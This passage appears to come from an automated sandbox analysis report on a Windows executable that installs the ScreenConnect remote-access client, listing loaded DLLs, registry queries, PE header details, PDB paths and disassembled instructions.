                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: pzPO97QouM.exeStatic PE information: certificate valid
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: pzPO97QouM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: pzPO97QouM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E177000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1756054618.000000000044D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674DFC5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1765477512.0000000005582000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: pzPO97QouM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: pzPO97QouM.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1a4ee
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1BC0 push ecx; ret 0_2_009C1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887BDD2A5 pushad ; iretd 1_2_00007FF887BDD2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF7362 push cs; retf 485Dh1_2_00007FF887CF742A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF845E push eax; ret 1_2_00007FF887CF846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF842E pushad ; ret 1_2_00007FF887CF845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF00BD pushad ; iretd 1_2_00007FF887CF00C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887D08D47 push 8B495CDEh; iretd 1_2_00007FF887D08D4C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF887CF7D00 push eax; retf 1_2_00007FF887CF7D1D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887CC30BA push eax; iretd 10_2_00007FF887CC30BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887CC401A push eax; iretd 10_2_00007FF887CC401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF887CC2FDA pushad ; retf 10_2_00007FF887CC2FDB
